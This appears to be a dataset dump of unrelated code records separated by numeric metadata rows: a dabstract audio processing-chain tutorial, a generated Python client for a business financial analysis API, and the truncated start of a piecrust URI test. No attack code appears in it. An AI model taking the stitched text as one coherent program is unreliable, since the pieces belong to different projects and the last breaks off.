    wavfiles.append(os.path.join(datafolder,str(k) + '.wav'))
    numpyfiles.append(os.path.join(datafolder + '_numpy',str(k) + '.npy'))
    np.save(numpyfiles[k], D)
    # rate=1 so the sampling frequency matches the fs=1 used by the chains below
    audio_write(wavfiles[k], rate=1, data=D)
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.summary()
# apply processing chain to data
# make sure to provide the sampling frequency to dp. Kwargs are always accessible
# for all processing layers. Therefore, make sure the naming DOES NOT overlap
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time (alternative)
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
# in this example, fs is already set in the processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0,fs=1))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.summary()
# apply processing chain to data
output_data = dp(data)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
dp.summary()
# fit processing chain as Normalizer contains a 'fit' method to init parameters
dp.fit(DATA, fs=1)
# apply processing chain to data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before but the data is loaded from wav file
### As a consequence no extra fs information needs to be provided for processing.
### It is read from the wav header instead.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# define processing chain
dp = ProcessingChain()
dp.add(WavDatareader())
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
dp.summary()
# fit to wavfiles
dp.fit(wavfiles) # fit from wav files
#dp.fit(['data_intro/data_numpy/0.wav', 'data_intro/data_numpy/1.wav', 'data_intro/data_numpy/3.wav', ...], fs=1)
output_data = dp(wavfiles[2]) # process from wavfiles
#output_data = dp('data_intro/data_numpy/2.wav',fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before but the data is loaded from numpy file
### As a consequence extra fs information needs to be provided for processing.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# define processing chain
dp = ProcessingChain()
dp.add(NumpyDatareader())
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
# fit to numpy files
dp.fit(numpyfiles, fs=1) # fit from npy files
#dp.fit(['data_intro/data_numpy/0.npy', 'data_intro/data_numpy/1.npy', 'data_intro/data_numpy/3.npy', ...], fs=1)
output_data = dp(numpyfiles[2],fs=1) # process an npy file
#output_data = dp('data_intro/data_numpy/2.npy',fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization (created from hardcoded configuration)
from dabstract.dataprocessor import ProcessingChain
config = {'chain': [{'name': 'NumpyDatareader'},
                    {'name': 'Framing',
                     'parameters': {'axis': 0, 'stepsize': 10, 'windowsize': 10}},
                    {'name': 'FFT',
                     'parameters': {'axis': 1}},
                    {'name': 'Logarithm'},
                    {'name': 'Aggregation',
                     'parameters': {'axis': 0,
                                    'combine': 'concatenate',
                                    'methods': ['mean', 'std']}},
                    {'name': 'Normalizer',
                     'parameters': {'type': 'standard'}}]}
dp = ProcessingChain(config)
dp.summary()
# OR
# dp = ProcessingChain()
# dp.add(config)
dp.fit(numpyfiles, fs=1) # fit from npy files
#dp.fit(['data_intro/data_numpy/0.npy', 'data_intro/data_numpy/1.npy', 'data_intro/data_numpy/3.npy', ...], fs=1)
output_data = dp(numpyfiles[2],fs=1) # process an npy file
#output_data = dp('data_intro/data_numpy/2.npy',fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization (created from yaml config)
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration
config = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'))
# create processing chain from the yaml config
dp = ProcessingChain(config)
# fit data
dp.fit(DATA, fs=1)
# process
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before, but now the yaml loading fct and feed to ProcessingChain() is available in a one-liner.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# fit data
dp.fit(DATA, fs=1)
# process
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing layer
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain, Processor
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# custom processor.
# This is a minimal example of what a processor can do.
class custom_processor(Processor):
    def process(self, data, **kwargs):
        return data * 100, {}
        # returns: data, plus information that can be propagated to consecutive layers
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add a custom processor to the dp.chain
dp.add(custom_processor())
dp.summary()
# Fit data to chain
dp.fit(DATA, fs=1)
# process
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing with fit option
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain, Processor
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# custom processor.
# This is a minimal example of what a processor can do.
# NOTE: this rebinds the name custom_processor from the previous section.
class custom_processor(Processor):
    def process(self, data, **kwargs):
        return (data - self.mean) * 100, {}
        # returns: data, plus information that can be propagated to consecutive layers
    def fit(self, data, info, **kwargs):
        # fit() is called by ProcessingChain.fit() to initialise parameters
        self.mean = np.mean(data)
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add custom processor
dp.add(custom_processor())
dp.summary()
# fit data (it's recursive, so both the normalizer and the custom_processor are fit'ed on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to use any function in a dabstract processing chain and still use info propagation
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
def custom_fct(data, **kwargs):
    """Example plain function usable as a processing step: shift by 5, scale by 100."""
    shifted = data - 5
    return shifted * 100
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add custom processors
dp.add(custom_fct)
dp.add(lambda x: x*100)
dp.summary()
# fit data (it's recursive, so both the normalizer and the custom_processor are fit'ed on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing layer within configuration using !class
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config_custom', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# fit data (it's recursive, so both the normalizer and the custom_processor are fit'ed on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create a lazy data source from disk with additional processing
### Adds a lazy mapping function to DATA and allow multi-example indexing
# -- processing chain for multiple examples
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
from dabstract.abstract.abstract import MapAbstract, DataAbstract
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# Fit data
dp.fit(DATA, fs=1)
# Make an abstract data source
# you can now access data as with typical indexing
# e.g. datab[0], data[1]
# in this way it accesses DATA[0] and DATA[1] respectively with the additional dp
datab = MapAbstract(DATA,dp, fs=1)
print(datab)
# allow for multi indexing, e.g. data[:] or data[0,1]
datab = DataAbstract(datab, fs=1)
print(datab)
print('\n\n\n')
# -------------------------------------------------------------------------
### Add multi-processing to lazy data source
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# Fit data
dp.fit(DATA, fs=1)
# Make an abstract data source
# you can now access data as with typical indexing
# e.g. datab[0], data[1]
# in this way it accesses DATA[0] and DATA[1] respectively with the additional dp
datab = MapAbstract(DATA,dp, fs = 1)
print(datab)
# allow for multi indexing, e.g. data[:] or data[0,1]
# and allow for multiprocessing with the workers and buffer_len flag
# indexing is parallelized, but so is the iterator
datab = DataAbstract(datab, workers=2, buffer_len=2)
print(datab)
for k,d in enumerate(datab):
    print('Example ' + str(k))
    print(d)
| 39.8375
| 123
| 0.677832
| 1,747
| 12,748
| 4.870063
| 0.126503
| 0.055007
| 0.082511
| 0.052656
| 0.776681
| 0.746121
| 0.746121
| 0.746121
| 0.732487
| 0.712858
| 0
| 0.012342
| 0.129275
| 12,748
| 319
| 124
| 39.962382
| 0.754144
| 0.430499
| 0
| 0.736264
| 1
| 0
| 0.092264
| 0.003516
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021978
| false
| 0
| 0.214286
| 0.016484
| 0.263736
| 0.17033
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e81dd64ef4d274a0c0e5f2f3b5bf7934ecb70dc7
| 23,019
|
py
|
Python
|
atom/proton/python/proton_api/api/business_financial_management_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 11
|
2019-04-16T02:11:17.000Z
|
2021-12-16T22:51:40.000Z
|
atom/proton/python/proton_api/api/business_financial_management_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 81
|
2019-11-19T23:24:28.000Z
|
2022-03-28T11:35:47.000Z
|
atom/proton/python/proton_api/api/business_financial_management_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 11
|
2020-07-08T02:29:56.000Z
|
2022-03-28T10:05:33.000Z
|
# coding: utf-8
"""
Hydrogen Proton API
Financial engineering module of Hydrogen Atom # noqa: E501
OpenAPI spec version: 1.9.2
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from proton_api.api_client import ApiClient
class BusinessFinancialManagementApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Bind the client used for all HTTP calls; build a default ApiClient when none is given."""
    self.api_client = ApiClient() if api_client is None else api_client
def business_financial_health_check(self, business_financial_health_check_request, **kwargs):  # noqa: E501
    """Business Financial Health Check  # noqa: E501

    Calculate a series of financial ratios to assess business financial health  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.business_financial_health_check(business_financial_health_check_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param BusinessFinancialHealthCheckRequest business_financial_health_check_request: Request payload for Business Financial Health Check (required)
    :return: dict(str, object)
             If the method is called asynchronously,
             returns the request thread.
    """
    # Thin convenience wrapper: always strip transport metadata from the result.
    kwargs['_return_http_data_only'] = True
    delegate = self.business_financial_health_check_with_http_info
    if kwargs.get('async_req'):
        return delegate(business_financial_health_check_request, **kwargs)  # noqa: E501
    (data) = delegate(business_financial_health_check_request, **kwargs)  # noqa: E501
    return data
def business_financial_health_check_with_http_info(self, business_financial_health_check_request, **kwargs):  # noqa: E501
    """Business Financial Health Check  # noqa: E501

    Calculate a series of financial ratios to assess business financial health  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.business_financial_health_check_with_http_info(business_financial_health_check_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param BusinessFinancialHealthCheckRequest business_financial_health_check_request: Request payload for Business Financial Health Check (required)
    :return: dict(str, object)
             If the method is called asynchronously,
             returns the request thread.
    """
    # NOTE(review): auto-generated by swagger-codegen — keep edits minimal.
    # Reject any keyword argument that is not a known request option.
    all_params = ['business_financial_health_check_request']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method business_financial_health_check" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'business_financial_health_check_request' is set
    if self.api_client.client_side_validation and ('business_financial_health_check_request' not in params or
                                                   params['business_financial_health_check_request'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `business_financial_health_check_request` when calling `business_financial_health_check`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    # The whole request object travels as the JSON body.
    body_params = None
    if 'business_financial_health_check_request' in params:
        body_params = params['business_financial_health_check_request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501
    return self.api_client.call_api(
        '/business/financial_health_check', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='dict(str, object)',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def cash_analysis(self, cash_analysis_request, **kwargs):  # noqa: E501
    """Cash Analysis  # noqa: E501

    Analyze cash activity over time  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.cash_analysis(cash_analysis_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param CashAnalysisRequest cash_analysis_request: Request payload for Cash Analysis (required)
    :return: dict(str, object)
             If the method is called asynchronously,
             returns the request thread.
    """
    # Thin convenience wrapper: always strip transport metadata from the result.
    kwargs['_return_http_data_only'] = True
    delegate = self.cash_analysis_with_http_info
    if kwargs.get('async_req'):
        return delegate(cash_analysis_request, **kwargs)  # noqa: E501
    (data) = delegate(cash_analysis_request, **kwargs)  # noqa: E501
    return data
def cash_analysis_with_http_info(self, cash_analysis_request, **kwargs):  # noqa: E501
    """Cash Analysis  # noqa: E501

    Analyze cash activity over time  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.cash_analysis_with_http_info(cash_analysis_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param CashAnalysisRequest cash_analysis_request: Request payload for Cash Analysis (required)
    :return: dict(str, object)
             If the method is called asynchronously,
             returns the request thread.
    """
    # NOTE(review): auto-generated by swagger-codegen — keep edits minimal.
    # Reject any keyword argument that is not a known request option.
    all_params = ['cash_analysis_request']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method cash_analysis" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'cash_analysis_request' is set
    if self.api_client.client_side_validation and ('cash_analysis_request' not in params or
                                                   params['cash_analysis_request'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `cash_analysis_request` when calling `cash_analysis`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    # The whole request object travels as the JSON body.
    body_params = None
    if 'cash_analysis_request' in params:
        body_params = params['cash_analysis_request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501
    return self.api_client.call_api(
        '/business/cash_analysis', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='dict(str, object)',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def customer_analysis(self, customer_analysis_request, **kwargs):  # noqa: E501
    """Customer Analysis  # noqa: E501

    Analyze customer revenues over a time period  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.customer_analysis(customer_analysis_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param CustomerAnalysisRequest customer_analysis_request: Request payload for Customer Analysis (required)
    :return: dict(str, object)
             If the method is called asynchronously,
             returns the request thread.
    """
    # Thin convenience wrapper: always strip transport metadata from the result.
    kwargs['_return_http_data_only'] = True
    delegate = self.customer_analysis_with_http_info
    if kwargs.get('async_req'):
        return delegate(customer_analysis_request, **kwargs)  # noqa: E501
    (data) = delegate(customer_analysis_request, **kwargs)  # noqa: E501
    return data
def customer_analysis_with_http_info(self, customer_analysis_request, **kwargs):  # noqa: E501
    """Customer Analysis  # noqa: E501

    Analyze customer revenues over a time period  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.customer_analysis_with_http_info(customer_analysis_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param CustomerAnalysisRequest customer_analysis_request: Request payload for Customer Analysis (required)
    :return: dict(str, object)
             If the method is called asynchronously,
             returns the request thread.
    """
    # NOTE(review): auto-generated by swagger-codegen — keep edits minimal.
    # Reject any keyword argument that is not a known request option.
    all_params = ['customer_analysis_request']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method customer_analysis" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'customer_analysis_request' is set
    if self.api_client.client_side_validation and ('customer_analysis_request' not in params or
                                                   params['customer_analysis_request'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `customer_analysis_request` when calling `customer_analysis`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    # The whole request object travels as the JSON body.
    body_params = None
    if 'customer_analysis_request' in params:
        body_params = params['customer_analysis_request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501
    return self.api_client.call_api(
        '/business/customer_analysis', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='dict(str, object)',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def financial_statement_analysis(self, financial_statement_analysis_request, **kwargs):  # noqa: E501
    """Financial Statement Analysis  # noqa: E501

    Analyze financial statement accounting data for a business  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.financial_statement_analysis(financial_statement_analysis_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param FinancialStatementAnalysisRequest financial_statement_analysis_request: Request payload for Financial Statement Analysis (required)
    :return: dict(str, object)
             If the method is called asynchronously,
             returns the request thread.
    """
    # Thin convenience wrapper: always strip transport metadata from the result.
    kwargs['_return_http_data_only'] = True
    delegate = self.financial_statement_analysis_with_http_info
    if kwargs.get('async_req'):
        return delegate(financial_statement_analysis_request, **kwargs)  # noqa: E501
    (data) = delegate(financial_statement_analysis_request, **kwargs)  # noqa: E501
    return data
    def financial_statement_analysis_with_http_info(self, financial_statement_analysis_request, **kwargs):  # noqa: E501
        """Financial Statement Analysis  # noqa: E501

        Analyze financial statement accounting data for a business  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.financial_statement_analysis_with_http_info(financial_statement_analysis_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param FinancialStatementAnalysisRequest financial_statement_analysis_request: Request payload for Financial Statement Analysis (required)
        :return: dict(str, object)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Keyword arguments this endpoint accepts; anything else is a caller
        # error and is rejected below.
        all_params = ['financial_statement_analysis_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots `self`, the request object and `kwargs`; the
        # validated kwargs are folded into this dict and `kwargs` dropped.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method financial_statement_analysis" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'financial_statement_analysis_request' is set
        if self.api_client.client_side_validation and ('financial_statement_analysis_request' not in params or
                                                       params['financial_statement_analysis_request'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `financial_statement_analysis_request` when calling `financial_statement_analysis`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # The request object is sent as the JSON request body.
        body_params = None
        if 'financial_statement_analysis_request' in params:
            body_params = params['financial_statement_analysis_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501
        return self.api_client.call_api(
            '/business/financial_statement_analysis', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='dict(str, object)',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def invoice_analysis(self, invoice_analysis_request, **kwargs): # noqa: E501
"""Invoice Analysis # noqa: E501
Analyze invoices to understand the context of money owed and paid to a business # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.invoice_analysis(invoice_analysis_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BusinessInvoiceAnalysisRequest invoice_analysis_request: Request payload for Invoice Analysis (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.invoice_analysis_with_http_info(invoice_analysis_request, **kwargs) # noqa: E501
else:
(data) = self.invoice_analysis_with_http_info(invoice_analysis_request, **kwargs) # noqa: E501
return data
    def invoice_analysis_with_http_info(self, invoice_analysis_request, **kwargs):  # noqa: E501
        """Invoice Analysis  # noqa: E501

        Analyze invoices to understand the context of money owed and paid to a business  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.invoice_analysis_with_http_info(invoice_analysis_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param BusinessInvoiceAnalysisRequest invoice_analysis_request: Request payload for Invoice Analysis (required)
        :return: dict(str, object)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Keyword arguments this endpoint accepts; anything else is a caller
        # error and is rejected below.
        all_params = ['invoice_analysis_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots `self`, the request object and `kwargs`; the
        # validated kwargs are folded into this dict and `kwargs` dropped.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method invoice_analysis" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'invoice_analysis_request' is set
        if self.api_client.client_side_validation and ('invoice_analysis_request' not in params or
                                                       params['invoice_analysis_request'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `invoice_analysis_request` when calling `invoice_analysis`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # The request object is sent as the JSON request body.
        body_params = None
        if 'invoice_analysis_request' in params:
            body_params = params['invoice_analysis_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501
        return self.api_client.call_api(
            '/business/invoice_analysis', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='dict(str, object)',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| 43.432075
| 165
| 0.645206
| 2,560
| 23,019
| 5.509766
| 0.071094
| 0.045941
| 0.048919
| 0.055583
| 0.940021
| 0.922368
| 0.901808
| 0.867777
| 0.854803
| 0.854803
| 0
| 0.015408
| 0.275381
| 23,019
| 529
| 166
| 43.514178
| 0.830216
| 0.341674
| 0
| 0.734767
| 1
| 0
| 0.209499
| 0.104927
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039427
| false
| 0
| 0.014337
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e835d8aec98b25751b00916688f43a9e7f3821aa
| 2,813
|
py
|
Python
|
tests/test_uriutil.py
|
airbornemint/PieCrust2
|
bd8e44a1a3ba646a9ebfbb4d4f1fa01a1daa3beb
|
[
"Apache-2.0"
] | 43
|
2015-04-24T05:30:04.000Z
|
2022-02-03T17:47:35.000Z
|
tests/test_uriutil.py
|
airbornemint/PieCrust2
|
bd8e44a1a3ba646a9ebfbb4d4f1fa01a1daa3beb
|
[
"Apache-2.0"
] | 54
|
2015-01-03T01:58:44.000Z
|
2021-05-06T21:56:26.000Z
|
tests/test_uriutil.py
|
airbornemint/PieCrust2
|
bd8e44a1a3ba646a9ebfbb4d4f1fa01a1daa3beb
|
[
"Apache-2.0"
] | 8
|
2015-05-10T01:50:46.000Z
|
2016-12-26T20:53:15.000Z
|
import mock
import pytest
from piecrust.uriutil import split_sub_uri
@pytest.mark.parametrize('uri, expected, pretty_urls', [
    ('/', ('/', 1), True),
    ('/2', ('/', 2), True),
    ('/foo/bar', ('/foo/bar', 1), True),
    ('/foo/bar/', ('/foo/bar', 1), True),
